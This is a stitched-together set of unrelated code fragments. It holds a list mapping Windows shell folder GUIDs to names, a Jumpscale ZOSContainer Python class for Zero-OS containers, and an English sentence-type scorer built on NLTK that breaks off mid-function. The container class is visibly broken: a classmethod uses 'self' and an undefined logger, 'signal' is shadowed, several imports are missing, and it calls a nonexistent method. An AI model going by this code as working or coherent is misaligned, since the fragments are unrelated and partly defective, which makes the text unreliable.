"5ce4a5e9-e4eb-479d-b89f-130c02886155": "DeviceMetadataStore",
"5e6c858f-0e22-4760-9afe-ea3317b67173": "Profile",
"5e8fc967-829a-475c-93ea-51fce6d9ffce": "RealPlayer Cloud",
"5ea4f148-308c-46d7-98a9-49041b1dd468": "Mobility Center Control Panel",
"5f4eab9a-6833-4f61-899d-31cf46979d49": "Generic library",
"5fa947b5-650a-4374-8a9a-5efa4f126834": "OpenDrive",
"5fa96407-7e77-483c-ac93-691d05850de8": "Videos",
"5fcd4425-ca3a-48f4-a57c-b8a75c32acb1": "Hewlett-Packard Recovery (Protect.dll)",
"60632754-c523-4b62-b45c-4172da012619": "User Accounts",
"625b53c3-ab48-4ec1-ba1f-a1ef4146fc19": "Start Menu",
"62ab5d82-fdc1-4dc3-a9dd-070d1d495d97": "ProgramData",
"62d8ed13-c9d0-4ce8-a914-47dd628fb1b0": "Regional and Language Options",
"631958a6-ad0f-4035-a745-28ac066dc6ed": "Videos Library",
"6365d5a7-0f0d-45e5-87f6-0da56b6a4f7d": "Common Files",
"63da6ec0-2e98-11cf-8d82-444553540000": "Microsoft FTP Folder",
"640167b4-59b0-47a6-b335-a6b3c0695aea": "Portable Media Devices",
"645ff040-5081-101b-9f08-00aa002f954e": "Recycle bin",
"64693913-1c21-4f30-a98f-4e52906d3b56": "App Instance Folder",
"67718415-c450-4f3c-bf8a-b487642dc39b": "Windows Features",
"6785bfac-9d2d-4be5-b7e2-59937e8fb80a": "Other Users Folder",
"679f85cb-0220-4080-b29b-5540cc05aab6": "Home Folder",
"67ca7650-96e6-4fdd-bb43-a8e774f73a57": "Home Group Control Panel (Home Group)",
"692f0339-cbaa-47e6-b5b5-3b84db604e87": "Extensions Manager Folder",
"69d2cf90-fc33-4fb7-9a0c-ebb0f0fcb43c": "Slide Shows",
"6c8eec18-8d75-41b2-a177-8831d59d2d50": "Mouse",
"6dfd7c5c-2451-11d3-a299-00c04f8ef6af": "Folder Options",
"6f0cd92b-2e97-45d1-88ff-b0d186b8dedd": "Network Connections",
"7007acc7-3202-11d1-aad2-00805fc1270e": "Network Connections",
"708e1662-b832-42a8-bbe1-0a77121e3908": "Tree property value folder",
"71689ac1-cc88-45d0-8a22-2943c3e7dfb3": "Music Search Results",
"71d99464-3b6b-475c-b241-e15883207529": "Sync Results Folder",
"724ef170-a42d-4fef-9f26-b60e846fba4f": "Administrative tools",
"725be8f7-668e-4c7b-8f90-46bdb0936430": "Keyboard",
"72b36e70-8700-42d6-a7f7-c9ab3323ee51": "Search Connector Folder",
"74246bfc-4c96-11d0-abef-0020af6b0b7a": "Device Manager",
"767e6811-49cb-4273-87c2-20f355e1085b": "Camera Roll",
"76fc4e2d-d6ad-4519-a663-37bd56068185": "Printers",
"78cb147a-98ea-4aa6-b0df-c8681f69341c": "Windows CardSpace",
"78f3955e-3b90-4184-bd14-5397c15f1efc": "Performance Information and Tools",
"7a979262-40ce-46ff-aeee-7884ac3b6136": "Add Hardware",
"7a9d77bd-5403-11d2-8785-2e0420524153": "User Accounts (Users and Passwords)",
"7b0db17d-9cd2-4a93-9733-46cc89022e7c": "Documents",
"7b396e54-9ec5-4300-be0a-2482ebae1a26": "Gadgets",
"7b81be6a-ce2b-4676-a29e-eb907a5126c5": "Programs and Features",
"7bd29e00-76c1-11cf-9dd0-00a0c9034933": "Temporary Internet Files",
"7bd29e01-76c1-11cf-9dd0-00a0c9034933": "Temporary Internet Files",
"7be9d83c-a729-4d97-b5a7-1b7313c39e0a": "Programs Folder",
"7c5a40ef-a0fb-4bfc-874a-c0f2e0b9fa8e": "Program Files",
"7d1d3a04-debb-4115-95cf-2f29da2920da": "Searches",
"7d49d726-3c21-4f05-99aa-fdc2c9474656": "Documents",
"7e636bfe-dfa9-4d5e-b456-d7b39851d8a9": "Templates",
"7fde1a1e-8b31-49a5-93b8-6be14cfa4943": "Generic Search Results",
"80213e82-bcfd-4c4f-8817-bb27601267a9": "Compressed Folder (zip folder)",
"8060b2e3-c9d7-4a5d-8c6b-ce8eba111328": "Proximity CPL",
"80f3f1d5-feca-45f3-bc32-752c152e456e": "Tablet PC Settings",
"82a5ea35-d9cd-47c5-9629-e15d2f714e6e": "CommonStartup",
"82a74aeb-aeb4-465c-a014-d097ee346d63": "Control Panel",
"82ba0782-5b7a-4569-b5d7-ec83085f08cc": "TopViews",
"8343457c-8703-410f-ba8b-8b026e431743": "Feedback Tool",
"859ead94-2e85-48ad-a71a-0969cb56a6cd": "Sample Videos",
"85bbd920-42a0-1069-a2e4-08002b30309d": "Briefcase",
"863aa9fd-42df-457b-8e4d-0de1b8015c60": "Remote Printers",
"865e5e76-ad83-4dca-a109-50dc2113ce9a": "Programs Folder and Fast Items",
"871c5380-42a0-1069-a2ea-08002b30309d": "Internet Explorer (Homepage)",
"87630419-6216-4ff8-a1f0-143562d16d5c": "Mobile Broadband Profile Settings Editor",
"877ca5ac-cb41-4842-9c69-9136e42d47e2": "File Backup Index",
"87d66a43-7b11-4a28-9811-c86ee395acf7": "Indexing Options",
"88c6c381-2e85-11d0-94de-444553540000": "ActiveX Cache Folder",
"896664f7-12e1-490f-8782-c0835afd98fc": "Libraries delegate folder that appears in Users Files Folder",
"8983036c-27c0-404b-8f08-102d10dcfd74": "SendTo",
"89d83576-6bd1-4c86-9454-beb04e94c819": "MAPI Folder",
"8ad10c31-2adb-4296-a8f7-e4701232c972": "Resources",
"8e74d236-7f35-4720-b138-1fed0b85ea75": "OneDrive",
"8e908fc9-becc-40f6-915b-f4ca0e70d03d": "Network and Sharing Center",
"8fd8b88d-30e1-4f25-ac2b-553d3d65f0ea": "DXP",
"905e63b6-c1bf-494e-b29c-65b732d3d21a": "Program Files",
"9113a02d-00a3-46b9-bc5f-9c04daddd5d7": "Enhanced Storage Data Source",
"9274bd8d-cfd1-41c3-b35e-b13f55a758f4": "Printer Shortcuts",
"93412589-74d4-4e4e-ad0e-e0cb621440fd": "Font Settings",
"9343812e-1c37-4a49-a12e-4b2d810d956b": "Search Home",
"94d6ddcc-4a68-4175-a374-bd584a510b78": "Music",
"96437431-5a90-4658-a77c-25478734f03e": "Server Manager",
"96ae8d84-a250-4520-95a5-a47a7e3c548b": "Parental Controls",
"978e0ed7-92d6-4cec-9b59-3135b9c49ccf": "Music library",
"98d99750-0b8a-4c59-9151-589053683d73": "Windows Search Service Media Center Namespace Extension Handler",
"98ec0e18-2098-4d44-8644-66979315a281": "Microsoft Office Outlook",
"98f275b4-4fff-11e0-89e2-7b86dfd72085": "Start Menu Launcher Provider Folder",
"992cffa0-f557-101a-88ec-00dd010ccc48": "Network Connections",
"9a096bb5-9dc3-4d1c-8526-c3cbf991ea4e": "Internet Explorer RSS Feeds Folder",
"9b74b6a3-0dfd-4f11-9e78-5f7800f2e772": "The user's username (%USERNAME%)",
"9c60de1e-e5fc-40f4-a487-460851a8d915": "AutoPlay",
"9c73f5e5-7ae7-4e32-a8e8-8d23b85255bf": "Sync Center",
"9db7a13c-f208-4981-8353-73cc61ae2783": "Previous Versions",
"9e3995ab-1f9c-4f13-b827-48b24b6c7174": "User Pinned",
"9e52ab10-f80d-49df-acb8-4330f5687855": "CDBurning",
"9f433b7c-5f96-4ce1-ac28-aeaa1cc04d7c": "Security Center",
"9fe63afd-59cf-4419-9775-abcc3849f861": "System Recovery",
"a00ee528-ebd9-48b8-944a-8942113d46ac": "Start Menu Commanding Provider Folder",
"a0275511-0e86-4eca-97c2-ecd8f1221d08": "Infrared",
"a0953c92-50dc-43bf-be83-3742fed03c9c": "Videos",
"a302545d-deff-464b-abe8-61c8648d939b": "Libraries",
"a304259d-52b8-4526-8b1a-a1d6cecc8243": "iSCSI Initiator",
"a305ce99-f527-492b-8b1a-7e76fa98d6e4": "Installed Updates",
"a3918781-e5f2-4890-b3d9-a7e54332328c": "Application Shortcuts",
"a3c3d402-e56c-4033-95f7-4885e80b0111": "Previous Versions Results Delegate Folder",
"a3dd4f92-658a-410f-84fd-6fbbbef2fffe": "Internet Options",
"a4115719-d62e-491d-aa7c-e74b8be3b067": "Start Menu",
"a5110426-177d-4e08-ab3f-785f10b4439c": "Sony Ericsson File Manager",
"a520a1a4-1780-4ff6-bd18-167343c5af16": "AppDataLow",
"a52bba46-e9e1-435f-b3d9-28daa648c0f6": "OneDrive",
"a5a3563a-5755-4a6f-854e-afa3230b199f": "Library Folder",
"a5e46e3a-8849-11d1-9d8c-00c04fc99d61": "Microsoft Browser Architecture",
"a63293e8-664e-48db-a079-df759e0509f7": "Templates",
"a6482830-08eb-41e2-84c1-73920c2badb9": "Removable Storage Devices",
"a75d362e-50fc-4fb7-ac2c-a8beaa314493": "SidebarParts",
"a77f5d77-2e2b-44c3-a6a2-aba601054a51": "Programs",
"a8a91a66-3a7d-4424-8d24-04e180695c7a": "Device Center(Devices and Printers)",
"a8cdff1c-4878-43be-b5fd-f8091c1c60d0": "Documents",
"a990ae9f-a03b-4e80-94bc-9912d7504104": "Pictures",
"aaa8d5a5-f1d6-4259-baa8-78e7ef60835e": "RoamedTileImages",
"ab4f43ca-adcd-4384-b9af-3cecea7d6544": "Sitios Web",
"ab5fb87b-7ce2-4f83-915d-550846c9537b": "Camera Roll",
"ae50c081-ebd2-438a-8655-8a092e34987a": "Recent Items",
"aee2420f-d50e-405c-8784-363c582bf45a": "Device Pairing Folder",
"afdb1f70-2a4c-11d2-9039-00c04f8eeb3e": "Offline Files Folder",
"b155bdf8-02f0-451e-9a26-ae317cfd7779": "Delegate folder that appears in Computer",
"b250c668-f57d-4ee1-a63c-290ee7d1aa1f": "Sample Music",
"b28aa736-876b-46da-b3a8-84c5e30ba492": "Web sites",
"b2952b16-0e07-4e5a-b993-58c52cb94cae": "DB Folder",
"b2c761c6-29bc-4f19-9251-e6195265baf1": "Color Management",
"b3690e58-e961-423b-b687-386ebfd83239": "Pictures folder",
"b4bfcc3a-db2c-424c-b029-7fe99a87c641": "Desktop",
"b4fb3f98-c1ea-428d-a78a-d1f5659cba93": "Other Users Folder",
"b5947d7f-b489-4fde-9e77-23780cc610d1": "Virtual Machines",
"b689b0d0-76d3-4cbb-87f7-585d0e0ce070": "Games folder",
"b6ebfb86-6907-413c-9af7-4fc2abf07cc5": "Public Pictures",
"b7534046-3ecb-4c18-be4e-64cd4cb7d6ac": "Recycle Bin",
"b7bede81-df94-4682-a7d8-57a52620b86f": "Screenshots",
"b94237e7-57ac-4347-9151-b08c6c32d1f7": "CommonTemplates",
"b97d20bb-f46a-4c97-ba10-5e3608430854": "Startup",
"b98a2bea-7d42-4558-8bd1-832f41bac6fd": "Backup And Restore (Backup and Restore Center)",
"bb06c0e4-d293-4f75-8a90-cb05b6477eee": "System",
"bb64f8a7-bee7-4e1a-ab8d-7d8273f7fdb6": "Action Center",
"bc476f4c-d9d7-4100-8d4e-e043f6dec409": "Microsoft Browser Architecture",
"bc48b32f-5910-47f5-8570-5074a8a5636a": "Sync Results Delegate Folder",
"bcb5256f-79f6-4cee-b725-dc34e402fd46": "ImplicitAppShortcuts",
"bcbd3057-ca5c-4622-b42d-bc56db0ae516": "Programs",
"bd7a2e7b-21cb-41b2-a086-b309680c6b7e": "Client Side Cache Folder",
"bd84b380-8ca2-1069-ab1d-08000948f534": "Microsoft Windows Font Folder",
"bd85e001-112e-431e-983b-7b15ac09fff1": "RecordedTV",
"bdbe736f-34f5-4829-abe8-b550e65146c4": "TopViews",
"bdeadf00-c265-11d0-bced-00a0c90ab50f": "Web Folders",
"be122a0e-4503-11da-8bde-f66bad1e3f3a": "Windows Anytime Upgrade",
"bf782cc9-5a52-4a17-806c-2a894ffeeac5": "Language Settings",
"bfb9d5e0-c6a9-404c-b2b2-ae6db6af4968": "Links",
"c0542a90-4bf0-11d1-83ee-00a0c90dc849": "NETWORK_SERVER",
"c1bae2d0-10df-4334-bedd-7aa20b227a9d": "Common OEM Links",
"c1f8339f-f312-4c97-b1c6-ecdf5910c5c0": "Pictures library",
"c291a080-b400-4e34-ae3f-3d2b9637d56c": "UNCFAT IShellFolder Class",
"c2b136e2-d50e-405c-8784-363c582bf43e": "Device Center Initialization",
"c4900540-2379-4c75-844b-64e6faf8716b": "Sample Pictures",
"c4aa340d-f20f-4863-afef-f87ef2e6ba25": "Public Desktop",
"c4d98f09-6124-4fe0-9942-826416082da9": "Users libraries",
"c555438b-3c23-4769-a71f-b6d3d9b6053a": "Display",
"c57a6066-66a3-4d91-9eb9-41532179f0a5": "Application Suggested Locations",
"c58c4893-3be0-4b45-abb5-a63e4b8c8651": "Troubleshooting",
"c5abbf53-e17f-4121-8900-86626fc2c973": "Network Shortcuts",
"c870044b-f49e-4126-a9c3-b52a1ff411e8": "Ringtones",
"cac52c1a-b53d-4edc-92d7-6b2e8ac19434": "Games",
"cb1b7f8c-c50a-4176-b604-9e24dee8d4d1": "Welcome Center",
"cce6191f-13b2-44fa-8d14-324728beef2c": "{Unknown CSIDL}",
"d0384e7d-bac3-4797-8f14-cba229b392b5": "Administrative Tools",
"d17d1d6d-cc3f-4815-8fe3-607e7d5d10b3": "Text to Speech",
"d2035edf-75cb-4ef1-95a7-410d9ee17170": "DLNA Content Directory Data Source",
"d20beec4-5ca8-4905-ae3b-bf251ea09b53": "Network",
"d20ea4e1-3957-11d2-a40b-0c5020524152": "Fonts",
"d20ea4e1-3957-11d2-a40b-0c5020524153": "Administrative Tools",
"d24f75aa-4f2b-4d07-a3c4-469b3d9030c4": "Offline Files",
"d34a6ca6-62c2-4c34-8a7c-14709c1ad938": "Common Places FS Folder",
"d426cfd0-87fc-4906-98d9-a23f5d515d61": "Windows Search Service Outlook Express Protocol Handler",
"d4480a50-ba28-11d1-8e75-00c04fa31a86": "Add Network Place",
"d450a8a1-9568-45c7-9c0e-b4f9fb4537bd": "Installed Updates",
"d555645e-d4f8-4c29-a827-d93c859c4f2a": "Ease of Access",
"d5b1944e-db4e-482e-b3f1-db05827f0978": "Softex OmniPass Encrypted Folder",
"d6277990-4c6a-11cf-8d87-00aa0060f5bf": "Scheduled Tasks",
"d65231b0-b2f1-4857-a4ce-a8e7c6ea7d27": "System32",
"d8559eb9-20c0-410e-beda-7ed416aecc2a": "Windows Defender",
"d9dc8a3b-b784-432e-a781-5a1130a75963": "History",
"d9ef8727-cac2-4e60-809e-86f80a666c91": "Secure Startup (BitLocker Drive Encryption)",
"da3f6866-35fe-4229-821a-26553a67fc18": "General (Generic) library",
| |
<gh_stars>0
from Jumpscale import j
class ZOSContainer(j.baseclasses.object_config):
_SCHEMATEXT = """
@url = jumpscale.clients.zoscmd.zoscontainer.1
name** = "" (S)
zos_node_instance = "" (S) #name to the instance of the ZOSNode
ssh_client_instance = "" (S) #name of the ssh client instance (if already created), namne will be zos_container_$name
flist = ""
env = "" #k
ports = "" (dict)
"""
def _init(self, ZOSNode):
self.ZOSNode = None # links to the ZOSNode which hosts this ZOSContainer
# TODO: need to add relevant info in schema above
# self.name = name
# self.node = node
# self.mounts = mounts or {}
# self.hostname = hostname
# self.flist = flist
# self.ports = ports or {}
# self._nics = nics or []
# self.host_network = host_network
# self.storage = storage
# self.init_processes = init_processes or []
# self.privileged = privileged
# self._identity = identity
# self.env = env or {}
# self._client = None
# self.logger = logger or default_logger
#
# for nic in self.nics:
# nic.pop('ztClient', None)
# if nic.get('config', {}).get('gateway', ''):
# nic['monitor'] = True
# TODO: need to go over all methods & make compatible with our config mgmt
@classmethod
def from_containerinfo(cls, containerinfo, node, logger=None):
logger = logger or default_logger
self._log_debug("create container from info")
arguments = containerinfo["container"]["arguments"]
return cls(
name=arguments["name"],
node=node,
flist=arguments["root"],
hostname=arguments["hostname"],
mounts=arguments["mount"],
nics=arguments["nics"],
host_network=arguments["host_network"],
ports=arguments["port"],
storage=arguments["storage"],
privileged=arguments["privileged"],
identity=arguments["identity"],
env=arguments["env"],
logger=logger,
)
@property
def zos_client(self):
"""
return zos protocol client
:return:
"""
pass
@property
def ssh_client(self):
"""
:return: ssh client to this container
"""
pass
# implement caching at client side
def start(self):
if not self.is_running():
self._log_debug("start %s", self)
self._create_container()
for process in self.init_processes:
cmd = "{} {}".format(process["name"], " ".join(process.get("args", [])))
pwd = process.get("pwd", "")
stdin = process.get("stdin", "")
id = process.get("id")
env = {}
for x in process.get("environment", []):
k, v = x.split("=")
env[k] = v
self.client.system(command=cmd, dir=pwd, stdin=stdin, env=env, id=id)
assert self.running() == True
def stop(self):
"""
will stop the container and also his mountpoints
:return:
"""
if not self.is_running():
return
self._log_debug("stop %s", self)
self.node.client.container.terminate(self.id)
self._client = None
def is_running(self):
return self.node.is_running() and self.id is not None
#
def test(self):
pass
# do a basic test, look for client (e.g. start an ubuntu 18.04 container)
# make connection
# some test
@property
def id(self):
self._log_debug("get container id")
info = self.info
if info:
return info["container"]["id"]
return
@property
def info(self):
self._log_debug("get container info")
for containerid, container in self.node.client.container.list().items():
if self.name == container["container"]["arguments"]["name"]:
containerid = int(containerid)
container["container"]["arguments"]["identity"] = self._identity
if self._client and self._client.container != containerid:
self._client = None
container["container"]["id"] = int(containerid)
return container
return
@property
def identity(self):
if not self._identity:
if self.is_running():
for nic in self.nics:
if nic["type"] == "zerotier":
self._identity = self.client.zerotier.info()["secretIdentity"]
return self._identity
@property
def public_identity(self):
if self.is_running():
for nic in self.nics:
if nic["type"] == "zerotier":
return self.client.zerotier.info()["publicIdentity"]
@property
def ipv6(self, interface=None):
"""
return a list of all the ipv6 present in the container
the local ip are skipped
:param interface: only return the ips of a certain interface.
If none scan all the existing interfaces , defaults to None
:param interface: str, optional
:return: list of ip
:rtype: list
"""
interfaces = [interface]
if interface is None:
interfaces = [l["name"] for l in self.client.ip.link.list() if l["name"] not in ["lo"]]
ips = []
for interface in interfaces:
for ip in self.client.ip.addr.list(interface):
network = netaddr.IPNetwork(ip)
if network.version == 6 and network.is_link_local() is False:
ips.append(network.ip)
return ips
def default_ip(self, interface=None):
"""
Returns the ip if the container has a default nic
:return: netaddr.IPNetwork
"""
if interface is None:
for route in self.client.ip.route.list():
if route["gw"]:
interface = route["dev"]
break
else:
raise j.exceptions.NotFound("Could not find default interface")
for ipaddress in self.client.ip.addr.list(interface):
ip = netaddr.IPNetwork(ipaddress)
if ip.version == 4:
break
else:
raise j.exceptions.NotFound("Failed to get default ip")
return ip
def add_nic(self, nic):
self.node.client.container.nic_add(self.id, nic)
def remove_nic(self, nicname):
for idx, nic in enumerate(self.info["container"]["arguments"]["nics"]):
if nic["state"] == "configured" and nic["name"] == nicname:
break
else:
return
self.node.client.container.nic_remove(self.id, idx)
@property
def client(self):
if not self._client:
self._client = self.node.client.container.client(self.id)
return self._client
def upload_content(self, remote, content):
if isinstance(content, str):
content = content.encode("utf8")
bytes = BytesIO(content)
self.client.filesystem.upload(remote, bytes)
def download_content(self, remote):
buff = BytesIO()
self.client.filesystem.download(remote, buff)
return buff.getvalue().decode()
def _create_container(self, timeout=60):
self._log_debug("send create container command to zero-os (%s)", self.flist)
tags = [self.name]
if self.hostname and self.hostname != self.name:
tags.append(self.hostname)
# Populate the correct mounts dict
if type(self.mounts) == list:
mounts = {}
for mount in self.mounts:
try:
sp = self.node.storagepools.get(mount["storagepool"])
fs = sp.get(mount["filesystem"])
except KeyError:
continue
mounts[fs.path] = mount["target"]
self.mounts = mounts
job = self.node.client.container.create(
root_url=self.flist,
mount=self.mounts,
host_network=self.host_network,
nics=self.nics,
port=self.ports,
tags=tags,
name=self.name,
hostname=self.hostname,
storage=self.storage,
privileged=self.privileged,
identity=self.identity,
env=self.env,
)
if self.is_running():
self.identity
self._client = self.node.client.container.client(int(job.get(timeout)))
def is_job_running(self, id):
try:
for _ in self.client.job.list(id):
return True
return False
except Exception as err:
if str(err).find("invalid container id"):
return False
raise
def stop_job(self, id, timeout=30):
signal = signal.SIGTERM
is_running = self.is_job_running(id)
if not is_running:
return
self._log_debug("stop job: %s", id)
self.client.job.kill(id)
# wait for the daemon to stop
start = time.time()
end = start + timeout
is_running = self.is_job_running(id)
while is_running and time.time() < end:
time.sleep(1)
is_running = self.is_job_running(id)
if is_running:
raise j.exceptions.Base("Failed to stop job {}".format(id))
def is_port_listening(self, port, timeout=60, network=("tcp", "tcp6")):
def is_listening():
for lport in self.client.info.port():
if lport["network"] in network and lport["port"] == port:
return True
return False
if timeout:
start = time.time()
while start + timeout > time.time():
if is_listening():
return True
time.sleep(1)
return False
else:
return is_listening()
@property
def nics(self):
if self.is_running():
return list(filter(lambda nic: nic["state"] == "configured", self.info["container"]["arguments"]["nics"]))
else:
nics = []
for nic in self._nics:
nic.pop("state", None)
nics.append(nic)
return nics
def waitOnJob(self, job):
MAX_LOG = 15
logs = []
def callback(lvl, message, flag):
if len(logs) == MAX_LOG:
logs.pop(0)
logs.append(message)
if flag & 0x4 != 0:
erroMessage = " ".join(logs)
raise j.exceptions.Base(erroMessage)
resp = self.client.subscribe(job.id)
resp.stream(callback)
def get_forwarded_port(self, port):
for k, v in self.ports.items():
if v == port:
return int(k.split(":")[-1])
def authorize_networks(self, nics):
public_identity = self.public_identity
if not public_identity:
raise j.exceptions.Base("Failed to get zerotier public identity")
for nic in nics:
if nic["type"] == "zerotier":
client = j.clients.zerotier.get(nic["ztClient"], create=False, die=True, interactive=False)
network = client.network_get(nic["id"])
network.member_add(public_identity, self.name)
@property
def mgmt_addr(self):
return get_zt_ip(self.client.info.nic())
def __str__(self):
return j.core.tools.text_replace(
"{RED}zoscontainer{RESET}:%-14s %-25s:%-4s" % (self.name, self.addr, self.port)
)
__repr__ = __str__
# @property
# def identity(self):
# if not self._identity:
# if self.is_running():
# for nic in self.nics:
# if nic['type'] == 'zerotier':
# self._identity = self.client.zerotier.info()['secretIdentity']
# return self._identity
#
# @property
# def ipv6(self, interface=None):
# """
# return a list of all the ipv6 present in the container
#
# the local ip are skipped
#
# :param interface: only return the ips of a certain interface.
# If none scan all the existing interfaces , defaults to None
# :param interface: str, optional
# :return: list of ip
# :rtype: list
# """
#
# interfaces = [interface]
# if interface is None:
# interfaces = [l['name'] for l in self.client.ip.link.list() if l['name'] not in ['lo']]
#
# ips = []
# for interface in interfaces:
# for ip in self.client.ip.addr.list(interface):
# network = netaddr.IPNetwork(ip)
# if network.version == 6 and network.is_link_local() is False:
# ips.append(network.ip)
# return ips
#
# def default_ip(self, interface=None):
# """
# Returns the ip if the container has a default nic
# :return: netaddr.IPNetwork
# """
# if interface is None:
# for route in self.client.ip.route.list():
# if route['gw']:
# interface = route['dev']
# break
# else:
# raise j.exceptions.NotFound('Could not find default interface')
# for ipaddress in self.client.ip.addr.list(interface):
# ip = netaddr.IPNetwork(ipaddress)
# if ip.version == 4:
# break
# else:
# raise j.exceptions.NotFound('Failed to get default ip')
# return ip
#
# def add_nic(self, nic):
# self.node.client.container.nic_add(self.id, nic)
#
# def remove_nic(self, nicname):
# for idx, nic in enumerate(self.info['container']['arguments']['nics']):
# if nic['state'] == 'configured' and nic['name'] == nicname:
# break
# else:
# return
# self.node.client.container.nic_remove(self.id, idx)
#
# @property
# def client(self):
# if not self._client:
# self._client = self.node.client.container.client(self.id)
# return self._client
#
# | |
<reponame>OpenJarbas/little_questions
from nltk import word_tokenize, pos_tag
# begin of sentence indicators for Yes/No questions
YES_NO_STARTERS = ["would", "is", "will", "does", "can", "has", "if",
"could", "are", "should", "have", "has", "did"]
# begin of sentence indicators for "command" questions, eg, "do this"
# non exhaustive list, should capture common voice interactions
COMMAND_STARTERS = [
"name", "define", "list", "tell", "say"
]
ALL_POS_TAGS = ['NNPS', '--', '.', 'POS', 'RB', 'UH', 'SYM', '(', 'JJR', 'WDT',
'PRP', 'NNS', 'JJS', '$', 'JJ', 'IN', 'EX', 'CC', 'NN', 'MD',
'``', ',', 'RBR', ':', 'PDT', 'WP', 'RP', 'WP$', 'TO', 'VBP',
'WRB', 'VB', 'VBG', 'VBN', ')', 'DT', "''", 'PRP$', 'VBZ',
'VBD', 'FW', 'LS', 'CD', 'NNP', 'RBS']
# no good dataset for training, so this will work for now....
# TODO create dataset...
class SentenceScorerEN:
@staticmethod
def predict(text):
score = SentenceScorerEN.score(text)
best = max(score, key=lambda key: score[key])
return best
@staticmethod
def score(text):
return {
"question": SentenceScorerEN.question_score(text),
"statement": SentenceScorerEN.statement_score(text),
"exclamation": SentenceScorerEN.exclamation_score(text),
"command": SentenceScorerEN.command_score(text),
"request": SentenceScorerEN.request_score(text)
}
@staticmethod
def _score(text, last_tokens=None, first_tokens=None,
start_pos_tags=None, end_pos_tags=None, unlikely_words=None,
unlikely_start_pos_tag=None, unlikely_end_pos_tag=None,
unlikely_pos_tag=None):
score = 8
last_tokens = last_tokens or []
first_tokens = first_tokens or []
start_pos_tags = start_pos_tags or []
end_pos_tags = end_pos_tags or []
unlikely_words = unlikely_words or []
unlikely_start_pos_tag = unlikely_start_pos_tag or [t for t in
ALL_POS_TAGS if
t not in
start_pos_tags]
unlikely_end_pos_tag = unlikely_end_pos_tag or []
unlikely_pos_tag = unlikely_pos_tag or unlikely_end_pos_tag + unlikely_start_pos_tag
tokens = word_tokenize(text)
tagged = pos_tag(tokens)
if not tokens[-1] in last_tokens:
score -= 1
if not tokens[0] in first_tokens:
score -= 1
if not tagged[0][1] in start_pos_tags:
score -= 1
if not tagged[-1][1] in end_pos_tags:
score -= 1
if tagged[0][1] in unlikely_start_pos_tag:
score -= 1
if tagged[-1][1] in unlikely_end_pos_tag:
score -= 1
for pos in tagged:
if pos[1] in unlikely_pos_tag:
score -= 0.1
for tok in tokens:
if tok in unlikely_words:
score -= 0.2
if score <= 0:
return 0
return max(score / 7, 0)
@staticmethod
def question_score(text):
"""
Questions can have two patterns. Some can have ‘yes’ or ‘no’ as an answer.
For example,
Do you like Paris?,
Can you speak Russian?
Will you marry me?
Alternatively, they have a pattern that asks an ‘open’ question
which can have any number of answers, e.g.
What did you have for breakfast?
Which newspaper do you read?
Who is your favourite actor?
"""
# ends with a question mark
last_tokens = ["?"]
# starts with a question word
first_tokens = ["what", "why", "how", "when", "who", "whose",
"which"] + YES_NO_STARTERS
# WDT wh-determiner which
# WP wh-pronoun who, what
# WP$ possessive wh-pronoun whose
# WRB wh-abverb where, when
start_pos_tags = ["WDT", "WP", "WP$", "WRB", "VB", "VBP", "VBZ",
"VBN", "VBG"]
# pos_tags more likely to be in the end of question
# questions likely end with a question mark or
# Noun/Pronoun/Adjective, usually not verbs
end_pos_tags = [".", "NN", "NNP", "NNS", "NNPS", "PRP", "JJ"]
# all pos tags are unlikely except W*
unlikely_words = ["!"]
unlikely_start_pos_tag = [t for t in ALL_POS_TAGS if t not in
start_pos_tags]
unlikely_end_pos_tag = []
unlikely_pos_tag = []
score = SentenceScorerEN._score(text, last_tokens, first_tokens,
start_pos_tags,
end_pos_tags, unlikely_words,
unlikely_start_pos_tag,
unlikely_end_pos_tag,
unlikely_pos_tag)
starts = ["in what ", "on what ", "at what ", "in which"]
for s in starts:
if text.lower().startswith(s):
score += 0.1
break
# end of sentence
ends = [" in what", " on what", " for what", " as what", "?"]
for s in ends:
if text.lower().endswith(s):
score += 0.1
break
return min(score, 1)
@staticmethod
def statement_score(text):
"""
A statement is defined as having a structure in which there is typically a Subject,
followed by a verb and then a further unit such as a Direct Object.
For example,
Jimmy loves his dog,
The government will make an announcement at noon,
She reads two newspapers every day
"""
last_tokens = ["."]
# statements often start with "our X", "the X", "we/i X"
first_tokens = ["we", "i", "the", "our"]
# Our dog eats any old thing.
# The dog has already been fed.
# We have already won several races.
start_pos_tags = ["PRP", "PRP$", "DT"]
# Noun/Pronoun/Adjective, usually not verbs
end_pos_tags = [".", "NN", "NNP", "NNS", "NNPS", "PRP", "JJ"]
unlikely_words = ["what", "why", "how", "when", "who", "whose",
"which", "?", "!"]
unlikely_start_pos_tag = ["WDT", "WP", "WP$", "WRB", "VB",
"VBP", "VBZ", "VBN", "VBG"]
unlikely_end_pos_tag = []
unlikely_pos_tag = ["WDT", "WP", "WP$", "WRB"] # "what"
score = SentenceScorerEN._score(text, last_tokens, first_tokens,
start_pos_tags,
end_pos_tags, unlikely_words,
unlikely_start_pos_tag,
unlikely_end_pos_tag,
unlikely_pos_tag)
# TODO An important feature of declarative sentences is that they
# have a subject that comes before the verb.
if text.lower().startswith("be "):
score -= 0.1
# random bias, helps disambiguate
return max(min(score + 0.0001, 1), 0)
@staticmethod
def exclamation_score(text):
"""
Exclamations grammatically have a structure that involves the words what a or how,
What a nice person you are!
What a beautiful painting!,
How clever you are!,
How wonderful that is!
(Notice that the Subject goes before the verb in How clever you are!
If this were a question we would have How clever are you?)
"""
# often ends with an exclamation mark
last_tokens = ["!"]
# Exclamations grammatically have a structure that involves the words what or how,
first_tokens = ["how", "what"]
start_pos_tags = ["WP", "WRB"]
# Noun/Pronoun/Adjective, usually also verbs
end_pos_tags = [".", "NN", "NNP", "NNS", "NNPS", "PRP", "JJ", "VB",
"VBP", "VBZ", "VBN", "VBG"]
# words unlikely to appear in statements,
# if empty score is not penalized
unlikely_words = ["why", "when", "who", "whose", "which", "?"]
# starts with "what" and "how" only
unlikely_start_pos_tag = ["WDT", "WP$", "NN", "NNP", "NNS", "NNPS",
"DT", "PRP", "JJ", "VB", "VBP", "VBZ",
"VBN", "VBG", "PDT", "RB", "RBR", "RBS"]
unlikely_end_pos_tag = []
unlikely_pos_tag = ["WDT", "WP$"]
score = SentenceScorerEN._score(text, last_tokens, first_tokens,
start_pos_tags,
end_pos_tags, unlikely_words,
unlikely_start_pos_tag,
unlikely_end_pos_tag,
unlikely_pos_tag)
# TODO the Subject goes before the verb
# penalize if doesn't start as expected
if not text.split(" ")[0].lower() in first_tokens:
score -= 0.1
elif not text.lower().startswith("what a ") or \
not text.lower().startswith("what an "):
# if it only starts with "what" without "a" it's likely a question
score -= 0.1
# penalize if contains a question word
